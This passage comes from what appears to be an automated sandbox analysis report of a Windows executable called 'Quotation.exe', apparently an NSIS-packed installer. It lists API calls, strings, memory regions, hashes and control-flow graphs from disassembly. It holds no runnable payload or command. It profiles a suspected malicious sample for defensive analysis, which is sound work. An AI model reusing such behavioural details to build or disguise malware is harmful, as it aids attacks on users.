                                                              • Opcode Fuzzy Hash: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                              • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58

                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405C56
                                                              • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405C9E
                                                              • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405CC1
                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405CC7
                                                              • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405CD7
                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                              • FindClose.KERNEL32(00000000), ref: 00405D86
                                                              Strings
                                                              • \*.*, xrefs: 00405C98
                                                              • "C:\Users\user\Desktop\Quotation.exe", xrefs: 00405C36
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C3A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                              • API String ID: 2035342205-428933315
                                                              • Opcode ID: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                              • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                                                              • Opcode Fuzzy Hash: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                              • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE

                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                              • Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
                                                              • Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                              • Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                              • FindClose.KERNEL32(00000000), ref: 00406895
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\nsd350B.tmp, xrefs: 0040687E
                                                              • X_B, xrefs: 0040687F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsd350B.tmp$X_B
                                                              • API String ID: 2295610775-605717521
                                                              • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                              • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                                                              • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                              • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                              • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                                                              • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                              • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                              APIs
                                                              • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                              Strings
                                                              • C:\Users\user\ethnocentrism\skggene\Egyptians218, xrefs: 0040226E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\ethnocentrism\skggene\Egyptians218
                                                              • API String ID: 542301482-4259118363
                                                              • Opcode ID: fa9b9c77b3530ce2a287439bb95ef55590dcf9a522a2fbed8be09240dc413261
                                                              • Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
                                                              • Opcode Fuzzy Hash: fa9b9c77b3530ce2a287439bb95ef55590dcf9a522a2fbed8be09240dc413261
                                                              • Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: 39ec8271ecbe68cd688bb189458c102c7666cef281f0bf442c703dc48e606f12
                                                              • Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
                                                              • Opcode Fuzzy Hash: 39ec8271ecbe68cd688bb189458c102c7666cef281f0bf442c703dc48e606f12
                                                              • Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A

                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                              • ShowWindow.USER32(?), ref: 00403FFD
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                              • ShowWindow.USER32(?,00000004), ref: 00404028
                                                              • DestroyWindow.USER32 ref: 0040403C
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                              • GetDlgItem.USER32(?,?), ref: 00404074
                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                              • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                              • GetDlgItem.USER32(?,?), ref: 0040413A
                                                              • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041AF
                                                              • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                              • ShowWindow.USER32(00000000,?), ref: 00404276
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                              • EnableWindow.USER32(?,?), ref: 004042A3
                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042B9
                                                              • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 004042D8
                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                              • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                              • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                              • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID: X
                                                              • API String ID: 121052019-529171957
                                                              • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                              • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                                                              • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                              • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E

                                                              Control-flow Graph

                                                              control_flow_graph 309 403bf3-403c0b call 406915 312 403c0d-403c1d call 406468 309->312 313 403c1f-403c56 call 4063ef 309->313 321 403c79-403ca2 call 403ec9 call 405ef8 312->321 317 403c58-403c69 call 4063ef 313->317 318 403c6e-403c74 lstrcatW 313->318 317->318 318->321 327 403d34-403d3c call 405ef8 321->327 328 403ca8-403cad 321->328 334 403d4a-403d6f LoadImageW 327->334 335 403d3e-403d45 call 40655e 327->335 328->327 329 403cb3-403cdb call 4063ef 328->329 329->327 339 403cdd-403ce1 329->339 337 403df0-403df8 call 40140b 334->337 338 403d71-403da1 RegisterClassW 334->338 335->334 352 403e02-403e0d call 403ec9 337->352 353 403dfa-403dfd 337->353 340 403da7-403deb SystemParametersInfoW CreateWindowExW 338->340 341 403ebf 338->341 343 403cf3-403cff lstrlenW 339->343 344 403ce3-403cf0 call 405e1d 339->344 340->337 346 403ec1-403ec8 341->346 347 403d01-403d0f lstrcmpiW 343->347 348 403d27-403d2f call 405df0 call 406521 343->348 344->343 347->348 351 403d11-403d1b GetFileAttributesW 347->351 348->327 355 403d21-403d22 call 405e3c 351->355 356 403d1d-403d1f 351->356 362 403e13-403e2d ShowWindow call 4068a5 352->362 363 403e96-403e97 call 405679 352->363 353->346 355->348 356->348 356->355 370 403e39-403e4b GetClassInfoW 362->370 371 403e2f-403e34 call 4068a5 362->371 366 403e9c-403e9e 363->366 368 403ea0-403ea6 366->368 369 403eb8-403eba call 40140b 366->369 368->353 374 403eac-403eb3 call 40140b 368->374 369->341 372 403e63-403e86 DialogBoxParamW call 40140b 370->372 373 403e4d-403e5d GetClassInfoW RegisterClassW 370->373 371->370 379 403e8b-403e94 call 403b43 372->379 373->372 374->353 379->346
                                                              APIs
                                                                • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                              • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Quotation.exe",00008001), ref: 00403C74
                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\ethnocentrism\skggene\Egyptians218,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420), ref: 00403CF4
                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\ethnocentrism\skggene\Egyptians218,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403D12
                                                              • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\ethnocentrism\skggene\Egyptians218), ref: 00403D5B
                                                                • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                              • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                              • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                              • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                              • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\ethnocentrism\skggene\Egyptians218$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                              • API String ID: 1975747703-3161716186
                                                              • Opcode ID: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                              • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                                                              • Opcode Fuzzy Hash: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                              • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D

                                                              Control-flow Graph

                                                              control_flow_graph 383 403082-4030d0 GetTickCount GetModuleFileNameW call 406011 386 4030d2-4030d7 383->386 387 4030dc-40310a call 406521 call 405e3c call 406521 GetFileSize 383->387 388 4032b2-4032b6 386->388 395 403110 387->395 396 4031f5-403203 call 40301e 387->396 398 403115-40312c 395->398 402 403205-403208 396->402 403 403258-40325d 396->403 400 403130-403139 call 40349e 398->400 401 40312e 398->401 410 40325f-403267 call 40301e 400->410 411 40313f-403146 400->411 401->400 405 40320a-403222 call 4034b4 call 40349e 402->405 406 40322c-403256 GlobalAlloc call 4034b4 call 4032b9 402->406 403->388 405->403 434 403224-40322a 405->434 406->403 432 403269-40327a 406->432 410->403 412 4031c2-4031c6 411->412 413 403148-40315c call 405fcc 411->413 420 4031d0-4031d6 412->420 421 4031c8-4031cf call 40301e 412->421 413->420 430 40315e-403165 413->430 423 4031e5-4031ed 420->423 424 4031d8-4031e2 call 406a02 420->424 421->420 423->398 431 4031f3 423->431 424->423 430->420 436 403167-40316e 430->436 431->396 437 403282-403287 432->437 438 40327c 432->438 434->403 434->406 436->420 439 403170-403177 436->439 440 403288-40328e 437->440 438->437 439->420 441 403179-403180 439->441 440->440 442 403290-4032ab SetFilePointer call 405fcc 440->442 441->420 443 403182-4031a2 441->443 446 4032b0 442->446 443->403 445 4031a8-4031ac 443->445 447 4031b4-4031bc 445->447 448 4031ae-4031b2 445->448 446->388 447->420 449 4031be-4031c0 447->449 448->431 448->447 449->420
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00403093
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004030AF
                                                                • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406015
                                                                • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004030FB
                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: "C:\Users\user\Desktop\Quotation.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 2803837635-3241941453
                                                              • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                              • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                              • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                              • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D

                                                              Control-flow Graph

                                                              control_flow_graph 450 40655e-406567 451 406569-406578 450->451 452 40657a-406594 450->452 451->452 453 4067a4-4067aa 452->453 454 40659a-4065a6 452->454 455 4067b0-4067bd 453->455 456 4065b8-4065c5 453->456 454->453 457 4065ac-4065b3 454->457 459 4067c9-4067cc 455->459 460 4067bf-4067c4 call 406521 455->460 456->455 458 4065cb-4065d4 456->458 457->453 461 406791 458->461 462 4065da-40661d 458->462 460->459 464 406793-40679d 461->464 465 40679f-4067a2 461->465 466 406623-40662f 462->466 467 406735-406739 462->467 464->453 465->453 468 406631 466->468 469 406639-40663b 466->469 470 40673b-406742 467->470 471 40676d-406771 467->471 468->469 474 406675-406678 469->474 475 40663d-40665b call 4063ef 469->475 472 406752-40675e call 406521 470->472 473 406744-406750 call 406468 470->473 476 406781-40678f lstrlenW 471->476 477 406773-40677c call 40655e 471->477 486 406763-406769 472->486 473->486 481 40667a-406686 GetSystemDirectoryW 474->481 482 40668b-40668e 474->482 485 406660-406663 475->485 476->453 477->476 487 406718-40671b 481->487 488 4066a0-4066a4 482->488 489 406690-40669c GetWindowsDirectoryW 482->489 491 406669-406670 call 40655e 485->491 492 40671d-406720 485->492 486->476 493 40676b 486->493 487->492 494 40672d-406733 call 4067cf 487->494 488->487 490 4066a6-4066c4 488->490 489->488 496 4066c6-4066cc 490->496 497 4066d8-4066f0 call 406915 490->497 491->487 492->494 499 406722-406728 lstrcatW 492->499 493->494 494->476 503 4066d4-4066d6 496->503 507 4066f2-406705 SHGetPathFromIDListW CoTaskMemFree 497->507 508 406707-406710 497->508 499->494 503->497 505 406712-406716 503->505 505->487 507->505 507->508 508->490 508->505
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406680
                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                              • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004066F4
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
